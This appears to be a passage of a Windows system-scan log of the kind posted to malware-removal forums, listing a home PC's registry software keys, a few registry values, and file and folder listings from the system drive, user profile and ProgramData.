[HKEY_CURRENT_USER\Software\Razer]

[HKEY_CURRENT_USER\Software\Realtek]

[HKEY_CURRENT_USER\Software\Red 5 Studios]

[HKEY_CURRENT_USER\Software\Redbeet Interactive]

[HKEY_CURRENT_USER\Software\RedBird Interactives]

[HKEY_CURRENT_USER\Software\RegisteredApplications]

[HKEY_CURRENT_USER\Software\Riot Games]

[HKEY_CURRENT_USER\Software\RiotGames]

[HKEY_CURRENT_USER\Software\ROBLOX Corporation]

[HKEY_CURRENT_USER\Software\RobloxReg]

[HKEY_CURRENT_USER\Software\Robot Entertainment]

[HKEY_CURRENT_USER\Software\RomsUp]

[HKEY_CURRENT_USER\Software\Rtp]

[HKEY_CURRENT_USER\Software\Safer Networking Limited]

[HKEY_CURRENT_USER\Software\ScanSoft]

[HKEY_CURRENT_USER\Software\Setleaf]

[HKEY_CURRENT_USER\Software\SKS]

[HKEY_CURRENT_USER\Software\skype]

[HKEY_CURRENT_USER\Software\skypeapp-11497614bb16]

[HKEY_CURRENT_USER\Software\skypeapp-381b37b4f88b]

[HKEY_CURRENT_USER\Software\Smartly Dressed Games]

[HKEY_CURRENT_USER\Software\Soccer Manager Ltd]

[HKEY_CURRENT_USER\Software\Sony Corporation]

[HKEY_CURRENT_USER\Software\Sony Creative Software]

[HKEY_CURRENT_USER\Software\spleen]

[HKEY_CURRENT_USER\Software\SplitmediaLabs]

[HKEY_CURRENT_USER\Software\Spotify]

[HKEY_CURRENT_USER\Software\Stardock]

[HKEY_CURRENT_USER\Software\StudioQTRobloxReg]

[HKEY_CURRENT_USER\Software\Stunlock Studios]

[HKEY_CURRENT_USER\Software\Subvert Games]

[HKEY_CURRENT_USER\Software\SUPERAntiSpyware.com]

[HKEY_CURRENT_USER\Software\Supra Games]

[HKEY_CURRENT_USER\Software\System32]

[HKEY_CURRENT_USER\Software\Team 17 Digital ltd.]

[HKEY_CURRENT_USER\Software\TeamNova]

[HKEY_CURRENT_USER\Software\TeamPsykskallar]

[HKEY_CURRENT_USER\Software\TeamViewer]

[HKEY_CURRENT_USER\Software\TechSmith]

[HKEY_CURRENT_USER\Software\Tencent]

[HKEY_CURRENT_USER\Software\tfdfu]

[HKEY_CURRENT_USER\Software\thriXXX]

[HKEY_CURRENT_USER\Software\ToastyLeaf]

[HKEY_CURRENT_USER\Software\Trion Worlds]

[HKEY_CURRENT_USER\Software\Trolltech]

[HKEY_CURRENT_USER\Software\Twitch Interactive, Inc.]

[HKEY_CURRENT_USER\Software\U-Play online]

[HKEY_CURRENT_USER\Software\UFO online]

[HKEY_CURRENT_USER\Software\undefined]

[HKEY_CURRENT_USER\Software\Undertale Patch FR]

[HKEY_CURRENT_USER\Software\Unity]

[HKEY_CURRENT_USER\Software\Unnyhog]

[HKEY_CURRENT_USER\Software\Valve]

[HKEY_CURRENT_USER\Software\VB and VBA Program Settings]

[HKEY_CURRENT_USER\Software\VIS-Games]

[HKEY_CURRENT_USER\Software\VRChat]

[HKEY_CURRENT_USER\Software\VS Revo Group]

[HKEY_CURRENT_USER\Software\Wargaming.net]

[HKEY_CURRENT_USER\Software\WARTEAM]

[HKEY_CURRENT_USER\Software\WEBZEN]

[HKEY_CURRENT_USER\Software\WinRAR]

[HKEY_CURRENT_USER\Software\WinRAR SFX]

[HKEY_CURRENT_USER\Software\Wizards of the Coast]

[HKEY_CURRENT_USER\Software\Wondershare]

[HKEY_CURRENT_USER\Software\Wow6432Node]

[HKEY_CURRENT_USER\Software\Wyrmbyte LLC]

[HKEY_CURRENT_USER\Software\YandereDev]

[HKEY_CURRENT_USER\Software\{4E1B0D74-9DE3-4d5c-ABB5-5717F0485A00}]

[HKEY_CURRENT_USER\Software\{B16567B0-E020-64F3-E513-16EAC921A72F}]

[HKEY_CURRENT_USER\Software\{ca7cfce32dd19d0907dcdbc508c15c37}]

[HKEY_CURRENT_USER\Software\{D68A97AF-1799-FA51-6754-55FAA5165E60}]

[HKEY_CURRENT_USER\Software\Classes]

[color=#A23BEC]< HKCU\Software\AppDataLow /s >[/color]
[HKEY_CURRENT_USER\Software\AppDataLow\Software]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\DefaultCompany]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\DefaultCompany\Retro YouTube Simulator]
"unity.cloud_userid_h2665564582" = 6cfed27c4fce6f24ba7ac2690616b859 [binary data]
"Screenmanager Resolution Width_h182942802" = 640
"Screenmanager Resolution Height_h2627697771" = 480
"Screenmanager Is Fullscreen mode_h3981298716" = 0
"UnityGraphicsQuality_h1669003810" = 0
"UnitySelectMonitor_h17969598" = 0
"unity.player_sessionid_h1351336811" = 4965118322172994766 [binary data]
"unity.player_session_elapsed_time_h192694777" = 445347 [binary data]
"unity.player_session_background_time_h123860221" = 1493491383612 [binary data]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\JavaSoft]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\JavaSoft\DeploymentProperties]
"deployment.version" = 8
"deployment.browser.path" = C:\WINDOWS\system32\LaunchWinApp.exe -- [2017/09/29 14:42:25 | 000,033,280 | ---- | M] (Microsoft Corporation)
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\IME]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\IME\15.0]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\IME\15.0\IMEJP]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\Internet Explorer]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\RepService]
"i" = 8F04254B-B1BA-4459-B72E-43430F335370 [binary data]
"B" = 50.000000 [binary data]
"A" = .cpl,.exe,.dll,.ocx,.sys,.scr,.drv [Binary data over 200 bytes]
"E" = 1 [binary data]
"BB" = 1.000000 [binary data]
"AA" = .cpl,.exe,.dll,.ocx,.sys,.scr,.drv [Binary data over 200 bytes]
"MM" = 0.050000 [binary data]
"NN" = 131697200455872290 [binary data]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\Windows]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\Windows\CurrentVersion]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\Windows\CurrentVersion\Lock Screen]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Norton]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Common Client]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Unity]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Unity\UnityStandalone]
"StandaloneStatsDone" = yes
[HKEY_CURRENT_USER\Software\AppDataLow\Software\Unity\WebPlayer]
"" =

[color=#A23BEC]< HKLM\Software >[/color]
"" =

[HKEY_LOCAL_MACHINE\Software\activision]

[HKEY_LOCAL_MACHINE\Software\Adobe]

[HKEY_LOCAL_MACHINE\Software\AdwCleaner]

[HKEY_LOCAL_MACHINE\Software\AGEIA Technologies]

[HKEY_LOCAL_MACHINE\Software\AMD]

[HKEY_LOCAL_MACHINE\Software\Apple Inc.]

[HKEY_LOCAL_MACHINE\Software\Applogon]

[HKEY_LOCAL_MACHINE\Software\Arktos Entertainment Group]

[HKEY_LOCAL_MACHINE\Software\AROnline]

[HKEY_LOCAL_MACHINE\Software\ASIO]

[HKEY_LOCAL_MACHINE\Software\ATI]

[HKEY_LOCAL_MACHINE\Software\ATI Technologies]

[HKEY_LOCAL_MACHINE\Software\AVAST Software]

[HKEY_LOCAL_MACHINE\Software\AVS4YOU]

[HKEY_LOCAL_MACHINE\Software\Bethesda Softworks]

[HKEY_LOCAL_MACHINE\Software\BioWare]

[HKEY_LOCAL_MACHINE\Software\Blizzard Entertainment]

[HKEY_LOCAL_MACHINE\Software\BlueSoleil cPhone]

[HKEY_LOCAL_MACHINE\Software\BlueStacks]

[HKEY_LOCAL_MACHINE\Software\BlueStacksGP]

[HKEY_LOCAL_MACHINE\Software\BSTweaker]

[HKEY_LOCAL_MACHINE\Software\Canon]

[HKEY_LOCAL_MACHINE\Software\Caphyon]

[HKEY_LOCAL_MACHINE\Software\CDDB]

[HKEY_LOCAL_MACHINE\Software\Chromium]

[HKEY_LOCAL_MACHINE\Software\ckimersp.exe]

[HKEY_LOCAL_MACHINE\Software\Clover]

[HKEY_LOCAL_MACHINE\Software\Clovermgr]

[HKEY_LOCAL_MACHINE\Software\Cygwin]

[HKEY_LOCAL_MACHINE\Software\DownloadHelper]

[HKEY_LOCAL_MACHINE\Software\DSDCS]

[HKEY_LOCAL_MACHINE\Software\DuoDianOnline]

[HKEY_LOCAL_MACHINE\Software\EasyAntiCheat]

[HKEY_LOCAL_MACHINE\Software\Epic Games]

[HKEY_LOCAL_MACHINE\Software\EpicGames]

[HKEY_LOCAL_MACHINE\Software\FFOnline]

[HKEY_LOCAL_MACHINE\Software\Firefox]

[HKEY_LOCAL_MACHINE\Software\FlyingBird]

[HKEY_LOCAL_MACHINE\Software\Fraps]

[HKEY_LOCAL_MACHINE\Software\Freemake]

[HKEY_LOCAL_MACHINE\Software\Gameforge]

[HKEY_LOCAL_MACHINE\Software\GamersFirst]

[HKEY_LOCAL_MACHINE\Software\GlarySoft]

[HKEY_LOCAL_MACHINE\Software\GOG.com]

[HKEY_LOCAL_MACHINE\Software\Google]

[HKEY_LOCAL_MACHINE\Software\HaaliMkx]

[HKEY_LOCAL_MACHINE\Software\Hi-Rez Studios]

[HKEY_LOCAL_MACHINE\Software\HiRez Studios]

[HKEY_LOCAL_MACHINE\Software\IcarusStudios]

[HKEY_LOCAL_MACHINE\Software\IM Providers]

[HKEY_LOCAL_MACHINE\Software\InstallShield]

[HKEY_LOCAL_MACHINE\Software\Intel]

[HKEY_LOCAL_MACHINE\Software\IObit]

[HKEY_LOCAL_MACHINE\Software\JavaSoft]

[HKEY_LOCAL_MACHINE\Software\JreMetrics]

[HKEY_LOCAL_MACHINE\Software\Khronos]

[HKEY_LOCAL_MACHINE\Software\Licenses]

[HKEY_LOCAL_MACHINE\Software\Macromedia]

[HKEY_LOCAL_MACHINE\Software\MadByte]

[HKEY_LOCAL_MACHINE\Software\Magix]

[HKEY_LOCAL_MACHINE\Software\Malwarebytes' Anti-Malware]

[HKEY_LOCAL_MACHINE\Software\Matrox]

[HKEY_LOCAL_MACHINE\Software\Maxis]

[HKEY_LOCAL_MACHINE\Software\McAfee]

[HKEY_LOCAL_MACHINE\Software\MicroRay]

[HKEY_LOCAL_MACHINE\Software\Microsoft]

[HKEY_LOCAL_MACHINE\Software\Mozilla]

[HKEY_LOCAL_MACHINE\Software\mozilla.org]

[HKEY_LOCAL_MACHINE\Software\MozillaPlugins]

[HKEY_LOCAL_MACHINE\Software\NCWest]

[HKEY_LOCAL_MACHINE\Software\NexonEU]

[HKEY_LOCAL_MACHINE\Software\Norton]

[HKEY_LOCAL_MACHINE\Software\Norusuru]

[HKEY_LOCAL_MACHINE\Software\Notepad++]

[HKEY_LOCAL_MACHINE\Software\Nuance]

[HKEY_LOCAL_MACHINE\Software\NVIDIA Corporation]

[HKEY_LOCAL_MACHINE\Software\OBS Studio]

[HKEY_LOCAL_MACHINE\Software\ODBC]

[HKEY_LOCAL_MACHINE\Software\OldTimer Tools]

[HKEY_LOCAL_MACHINE\Software\On Networks]

[HKEY_LOCAL_MACHINE\Software\OpenAL]

[HKEY_LOCAL_MACHINE\Software\OpenOffice]

[HKEY_LOCAL_MACHINE\Software\Opera Software]

[HKEY_LOCAL_MACHINE\Software\Origin Games]

[HKEY_LOCAL_MACHINE\Software\Overwolf]

[HKEY_LOCAL_MACHINE\Software\Panzar Studio]

[HKEY_LOCAL_MACHINE\Software\PCSX2]

[HKEY_LOCAL_MACHINE\Software\PlaysTV]

[HKEY_LOCAL_MACHINE\Software\Ralink]

[HKEY_LOCAL_MACHINE\Software\Raptr]

[HKEY_LOCAL_MACHINE\Software\Razer]

[HKEY_LOCAL_MACHINE\Software\Realtek]

[HKEY_LOCAL_MACHINE\Software\REALTEK Semiconductor Corp.]

[HKEY_LOCAL_MACHINE\Software\Red 5 Studios]

[HKEY_LOCAL_MACHINE\Software\Remo Software]

[HKEY_LOCAL_MACHINE\Software\Riot Games]

[HKEY_LOCAL_MACHINE\Software\Riot Games, Inc]

[HKEY_LOCAL_MACHINE\Software\ROBLOX Corporation]

[HKEY_LOCAL_MACHINE\Software\RtWLan]

[HKEY_LOCAL_MACHINE\Software\ScanSoft]

[HKEY_LOCAL_MACHINE\Software\Screaming Bee]

[HKEY_LOCAL_MACHINE\Software\Setleaf]

[HKEY_LOCAL_MACHINE\Software\Skype]

[HKEY_LOCAL_MACHINE\Software\Sony Corporation]

[HKEY_LOCAL_MACHINE\Software\Sony Creative Software]

[HKEY_LOCAL_MACHINE\Software\SplitmediaLabs]

[HKEY_LOCAL_MACHINE\Software\SRS Labs]

[HKEY_LOCAL_MACHINE\Software\Stardock]

[HKEY_LOCAL_MACHINE\Software\SuperBoost]

[HKEY_LOCAL_MACHINE\Software\SwUSB]

[HKEY_LOCAL_MACHINE\Software\TeamViewer]

[HKEY_LOCAL_MACHINE\Software\TechSmith]

[HKEY_LOCAL_MACHINE\Software\Toshiba]

[HKEY_LOCAL_MACHINE\Software\uni mouse driver]

[HKEY_LOCAL_MACHINE\Software\Valve]

[HKEY_LOCAL_MACHINE\Software\VB-Audio]

[HKEY_LOCAL_MACHINE\Software\VideoLAN]

[HKEY_LOCAL_MACHINE\Software\Volatile]

[HKEY_LOCAL_MACHINE\Software\WafCX]

[HKEY_LOCAL_MACHINE\Software\WBGames]

[HKEY_LOCAL_MACHINE\Software\WinRAR]

[HKEY_LOCAL_MACHINE\Software\Wondershare]

[HKEY_LOCAL_MACHINE\Software\wsxy]

[HKEY_LOCAL_MACHINE\Software\XAJH]

[HKEY_LOCAL_MACHINE\Software\XOB]

[HKEY_LOCAL_MACHINE\Software\Classes]

[HKEY_LOCAL_MACHINE\Software\Clients]

[HKEY_LOCAL_MACHINE\Software\Even Balance]

[HKEY_LOCAL_MACHINE\Software\Policies]

[HKEY_LOCAL_MACHINE\Software\RegisteredApplications]

[color=#A23BEC]< HKCU\Software\Microsoft\Command Processor /s >[/color]
"CompletionChar" = 9
"DefaultColor" = 0
"EnableExtensions" = 1
"PathCompletionChar" = 9

[color=#A23BEC]< HKLM\Software\Microsoft\Command Processor /s >[/color]
"CompletionChar" = 64
"DefaultColor" = 0
"EnableExtensions" = 1
"PathCompletionChar" = 64

[color=#A23BEC]< HKLM\Software\Microsoft\Windows\CurrentVersion\RunMRU /s >[/color]

[color=#A23BEC]< HKLM\System\CurrentControlSet\Control\Session Manager\AppcertDlls /s >[/color]

[color=#A23BEC]< %Homedrive%\* >[/color]
[2016/06/28 11:34:22 | 000,000,040 | -H-- | M] () -- C:\006CE083FA60
[2016/08/20 09:07:31 | 000,000,112 | -H-- | M] () -- C:\2FFACF902D55
[2015/10/30 08:18:34 | 000,000,001 | -HS- | M] () -- C:\BOOTNXT
[2018/05/09 12:14:31 | 000,000,072 | -HS- | M] () -- C:\bootTel.dat
[2018/12/31 09:58:32 | 3992,977,406 | -HS- | M] () -- C:\pagefile.sys
[2018/05/19 08:28:29 | 000,000,218 | ---- | M] () -- C:\setup.log
[2018/12/31 09:58:32 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys

[color=#A23BEC]< %Homedrive%\*. >[/color]
[2017/05/18 13:38:08 | 000,000,000 | -H-D | M] -- C:\$AV_ASW
[2018/05/04 09:27:57 | 000,000,000 | -H-D | M] -- C:\$GetCurrent
[2017/12/09 12:34:30 | 000,000,000 | -H-D | M] -- C:\$GlaryQuarantine
[2017/06/29 20:40:26 | 000,000,000 | -HSD | M] -- C:\$Recycle.Bin
[2017/08/15 14:33:42 | 000,000,000 | -H-D | M] -- C:\$SysReset
[2018/08/09 06:51:33 | 000,000,000 | -H-D | M] -- C:\$WINDOWS.~BT
[2018/12/29 18:05:47 | 000,000,000 | ---D | M] -- C:\AdwCleaner
[2017/08/15 14:34:48 | 000,000,000 | -HSD | M] -- C:\AI_RecycleBin
[2016/06/22 15:57:37 | 000,000,000 | -H-D | M] -- C:\ArcTemp
[2016/02/24 17:49:32 | 000,000,000 | ---D | M] -- C:\CFLog
[2009/07/14 06:08:56 | 000,000,000 | -HSD | M] -- C:\Documents and Settings
[2015/12/01 19:00:46 | 000,000,000 | ---D | M] -- C:\Intel
[2017/12/14 02:40:31 | 000,000,000 | ---D | M] -- C:\PerfLogs
[2018/12/29 18:07:41 | 000,000,000 | R--D | M] -- C:\Program Files
[2018/12/29 17:50:09 | 000,000,000 | R--D | M] -- C:\Program Files (x86)
[2018/12/31 11:33:49 | 000,000,000 | -H-D | M] -- C:\ProgramData
[2018/05/04 09:07:36 | 000,000,000 | -HSD | M] -- C:\Recovery
[2018/12/31 11:45:00 | 000,000,000 | -HSD | M] -- C:\System Volume Information
[2018/09/19 17:17:50 | 000,000,000 | ---D | M] -- C:\TRIG
[2018/05/04 09:08:12 | 000,000,000 | R--D | M] -- C:\Users
[2018/12/29 10:23:52 | 000,000,000 | ---D | M] -- C:\Windows
[2018/05/03 14:52:44 | 000,000,000 | ---D | M] -- C:\Windows10Upgrade
[2016/12/18 17:36:12 | 000,000,000 | ---D | M] -- C:\~CLEAN.MFT

[color=#A23BEC]< %Homedrive%\Recycler\*.exe /s >[/color]

[color=#A23BEC]< %Homedrive%\Recycler\*.scr /s >[/color]

[color=#A23BEC]< %Homedrive%\Recycler\*.pif /s >[/color]

[color=#A23BEC]< %Homedrive%\Recycler\*.vb* /s >[/color]

[color=#A23BEC]< %Homedrive%\$Recycle.bin\*.exe /s >[/color]

[color=#A23BEC]< %Homedrive%\$Recycle.bin\*.scr /s >[/color]

[color=#A23BEC]< %Homedrive%\$Recycle.bin\*.pif /s >[/color]

[color=#A23BEC]< %Homedrive%\$Recycle.bin\*.vb* /s >[/color]

[color=#A23BEC]< %Userprofile%\* >[/color]
[2017/05/06 09:27:32 | 000,033,795 | ---- | M] () -- C:\Users\Thinkcentre\fullwindow000.png
[2017/07/31 22:35:03 | 000,000,066 | ---- | M] () -- C:\Users\Thinkcentre\inittk.ini
[2017/07/31 22:33:11 | 000,000,041 | ---- | M] () -- C:\Users\Thinkcentre\inst.ini
[2018/12/08 14:00:15 | 009,699,328 | -H-- | M] () -- C:\Users\Thinkcentre\NTUSER.DAT
[2018/05/04 09:08:12 | 002,437,120 | -HS- | M] () -- C:\Users\Thinkcentre\ntuser.dat.LOG1
[2018/05/04 09:08:12 | 001,572,864 | -HS- | M] () -- C:\Users\Thinkcentre\ntuser.dat.LOG2
[2018/12/09 09:38:07 | 001,048,576 | -HS- | M] () -- C:\Users\Thinkcentre\NTUSER.DAT{ba988f48-4f79-11e8-8493-d750df030ddb}.TxR.0.regtrans-ms
[2018/12/09 09:38:07 | 001,048,576 | -HS- | M] () -- C:\Users\Thinkcentre\NTUSER.DAT{ba988f48-4f79-11e8-8493-d750df030ddb}.TxR.1.regtrans-ms
[2018/12/09 09:38:07 | 001,048,576 | -HS- | M] () -- C:\Users\Thinkcentre\NTUSER.DAT{ba988f48-4f79-11e8-8493-d750df030ddb}.TxR.2.regtrans-ms
[2018/12/09 09:38:07 | 000,065,536 | -HS- | M] () -- C:\Users\Thinkcentre\NTUSER.DAT{ba988f48-4f79-11e8-8493-d750df030ddb}.TxR.blf
[2018/05/04 09:08:13 | 000,065,536 | -HS- | M] () -- C:\Users\Thinkcentre\NTUSER.DAT{ba988f49-4f79-11e8-8493-d750df030ddb}.TM.blf
[2018/05/04 09:08:13 | 000,524,288 | -HS- | M] () -- C:\Users\Thinkcentre\NTUSER.DAT{ba988f49-4f79-11e8-8493-d750df030ddb}.TMContainer00000000000000000001.regtrans-ms
[2018/05/04 09:08:13 | 000,524,288 | -HS- | M] () -- C:\Users\Thinkcentre\NTUSER.DAT{ba988f49-4f79-11e8-8493-d750df030ddb}.TMContainer00000000000000000002.regtrans-ms
[2018/05/04 09:28:30 | 000,000,020 | -HS- | M] () -- C:\Users\Thinkcentre\ntuser.ini
[2018/12/27 09:48:08 | 000,000,290 | RHS- | M] () -- C:\Users\Thinkcentre\ntuser.pol
[2017/07/31 22:33:12 | 000,000,045 | ---- | M] () -- C:\Users\Thinkcentre\nuuid.ini
[2017/07/10 20:35:09 | 000,000,000 | ---- | M] () -- C:\Users\Thinkcentre\Sti_Trace.log
[2017/05/06 09:27:42 | 000,014,779 | ---- | M] () -- C:\Users\Thinkcentre\toolbars000.png
[2017/05/06 09:27:54 | 000,014,779 | ---- | M] () -- C:\Users\Thinkcentre\toolbars001.png

[color=#A23BEC]< %Userprofile%\*. >[/color]
[2018/10/26 10:11:16 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\.android
[2018/10/26 10:10:35 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\.BigNox
[2018/02/03 11:12:32 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\.gimp-2.8
[2018/01/28 09:42:38 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\.Plays.tv
[2017/10/01 12:09:08 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\.QtWebEngineProcess
[2016/08/20 10:44:03 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\.swt
[2018/05/05 09:46:26 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\3D Objects
[2018/05/04 09:24:05 | 000,000,000 | -H-D | M] -- C:\Users\Thinkcentre\AppData
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Application Data
[2018/12/24 10:36:37 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\BrawlhallaReplays
[2018/05/05 09:46:26 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Contacts
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Cookies
[2018/01/13 23:56:50 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Creative Cloud Files
[2018/12/31 11:40:49 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Desktop
[2018/12/29 21:42:47 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Documents
[2018/12/31 11:38:55 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Downloads
[2017/10/10 20:22:14 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\dwhelper
[2018/10/13 08:16:48 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Favorites
[2017/12/28 12:27:15 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\Intel
[2018/05/05 09:46:39 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Links
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Local Settings
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Menu Démarrer
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Mes documents
[2018/05/04 09:32:58 | 000,000,000 | -H-D | M] -- C:\Users\Thinkcentre\MicrosoftEdgeBackups
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Modèles
[2018/08/07 16:45:46 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Music
[2017/08/15 16:45:32 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\Nox_share
[2018/12/29 22:00:47 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Pictures
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Recent
[2018/05/05 09:46:39 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Saved Games
[2018/05/05 09:46:26 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Searches
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\SendTo
[2017/02/16 18:21:41 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\Tracing
[2016/04/12 09:13:23 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\UnDownloads
[2018/12/23 14:03:30 | 000,000,000 | R--D | M] -- C:\Users\Thinkcentre\Videos
[2018/10/26 10:10:33 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\vmlogs
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Voisinage d'impression
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\Voisinage réseau

[color=#A23BEC]< %Allusersprofile%\* >[/color]
[2018/09/25 18:27:39 | 044,330,096 | ---- | M] (Online Media Technologies Ltd. ) -- C:\ProgramData\AppSetup.exe
[2017/04/16 07:19:17 | 000,000,000 | ---- | M] () -- C:\ProgramData\DP45977C.lfl
[2018/12/26 11:42:33 | 000,334,288 | ---- | M] (Mozilla Foundation) -- C:\ProgramData\freebl3.dll
[2018/04/18 08:52:09 | 000,000,032 | R--- | M] () -- C:\ProgramData\hash.dat
[2016/07/06 10:43:39 | 000,000,016 | ---- | M] () -- C:\ProgramData\mntemp
[2018/12/26 11:42:34 | 000,137,168 | ---- | M] (Mozilla Foundation) -- C:\ProgramData\mozglue.dll
[2018/12/26 11:42:35 | 000,440,120 | ---- | M] (Microsoft Corporation) -- C:\ProgramData\msvcp140.dll
[2018/12/26 11:42:36 | 001,246,160 | ---- | M] (Mozilla Foundation) -- C:\ProgramData\nss3.dll
[2018/12/26 11:43:21 | 000,003,346 | RHS- | M] () -- C:\ProgramData\ntuser.pol
[2016/07/22 18:52:59 | 000,000,872 | ---- | M] () -- C:\ProgramData\SMRResults501.dat
[2018/12/26 11:42:36 | 000,144,848 | ---- | M] (Mozilla Foundation) -- C:\ProgramData\softokn3.dll
[2018/12/26 11:42:37 | 000,083,784 | ---- | M] (Microsoft Corporation) -- C:\ProgramData\vcruntime140.dll

[color=#A23BEC]< %Allusersprofile%\*. >[/color]
[2017/08/16 13:45:17 | 000,000,000 | ---D | M] -- C:\ProgramData\.mono
[2017/08/16 08:20:53 | 000,000,000 | ---D | M] -- C:\ProgramData\Adobe
[2018/05/04 09:27:25 | 000,000,000 | -HSD | M] -- C:\ProgramData\Application Data
[2017/11/27 21:26:22 | 000,000,000 | ---D | M] -- C:\ProgramData\ATI
[2018/05/04 09:04:14 | 000,000,000 | ---D | M] -- C:\ProgramData\Audyssey Labs
[2017/07/11 09:57:21 | 000,000,000 | ---D | M] -- C:\ProgramData\AVAST Software
[2018/09/25 18:30:04 | 000,000,000 | ---D | M] -- C:\ProgramData\AVS4YOU
[2018/02/21 13:35:14 | 000,000,000 | ---D | M] -- C:\ProgramData\Backup
[2016/02/18 08:58:42 | 000,000,000 | ---D | M] -- C:\ProgramData\Battle.net
[2017/04/19 12:46:50 | 000,000,000 | ---D | M] -- C:\ProgramData\BDLogging
[2016/02/07 19:27:15 | 000,000,000 | ---D | M] -- C:\ProgramData\Blizzard Entertainment
[2018/06/20 14:31:03 | 000,000,000 | ---D | M] -- C:\ProgramData\BlueStacks
[2018/06/20 14:32:16 | 000,000,000 | ---D | M] -- C:\ProgramData\BlueStacksSetup
[2018/12/26 11:43:09 | 000,000,000 | ---D | M] -- C:\ProgramData\boost_interprocess
[2015/12/01 16:29:15 | 000,000,000 | -HSD | M] -- C:\ProgramData\Bureau
[2017/07/10 20:21:05 | 000,000,000 | -H-D | M] -- C:\ProgramData\CanonBJ
[2018/09/30 19:11:54 | 000,000,000 | ---D | M] -- C:\ProgramData\CanonIJPLM
[2018/05/17 10:20:48 | 000,000,000 | ---D | M] -- C:\ProgramData\Caphyon
[2016/07/17 10:01:51 | 000,000,000 | ---D | M] -- C:\ProgramData\DAEMON Tools Lite
[2018/01/17 13:47:21 | 000,000,000 | ---D | M] -- C:\ProgramData\dbg
[2018/05/04 09:27:25 | 000,000,000 | -HSD | M] -- C:\ProgramData\Documents
[2018/07/11 08:49:03 | 000,000,000 | ---D | M] -- C:\ProgramData\DriversCloud.com
[2018/05/17 10:21:18 | 000,000,000 | ---D | M] -- C:\ProgramData\DSDCS
[2018/07/05 10:04:49 | 000,000,000 | ---D | M] -- C:\ProgramData\Epic
[2016/05/22 13:17:57 | 000,000,000 | ---D | M] -- C:\ProgramData\eSellerate
[2015/12/01 16:29:15 | 000,000,000 | -HSD | M] -- C:\ProgramData\Favoris
[2018/09/25 19:06:26 | 000,000,000 | ---D | M] -- C:\ProgramData\Freemake
[2016/06/22 13:19:10 | 000,000,000 | ---D | M] -- C:\ProgramData\Gaijin
[2017/01/29 09:52:34 | 000,000,000 | ---D | M] -- C:\ProgramData\Gazillion Entertainment
[2016/05/16 09:15:42 | 000,000,000 | ---D | M] -- C:\ProgramData\GFACE
[2016/04/12 08:38:41 | 000,000,000 | ---D | M] -- C:\ProgramData\Glarysoft
[2016/10/08 12:22:13 | 000,000,000 | ---D | M] -- C:\ProgramData\Glyph
[2018/10/21 12:29:55 | 000,000,000 | ---D | M] -- C:\ProgramData\GOG.com
[2018/05/13 12:48:48 | 000,000,000 | ---D | M] -- C:\ProgramData\Hi-Rez Studios
[2018/04/28 19:03:09 | 000,000,000 | ---D | M] -- C:\ProgramData\Hunter
[2017/12/13 16:06:42 | 000,000,000 | ---D | M] -- C:\ProgramData\InstallShield
[2017/12/28 12:27:42 | 000,000,000 | ---D | M] -- C:\ProgramData\Intel
[2018/12/30 11:02:08 | 000,000,000 | ---D | M] -- C:\ProgramData\IObit
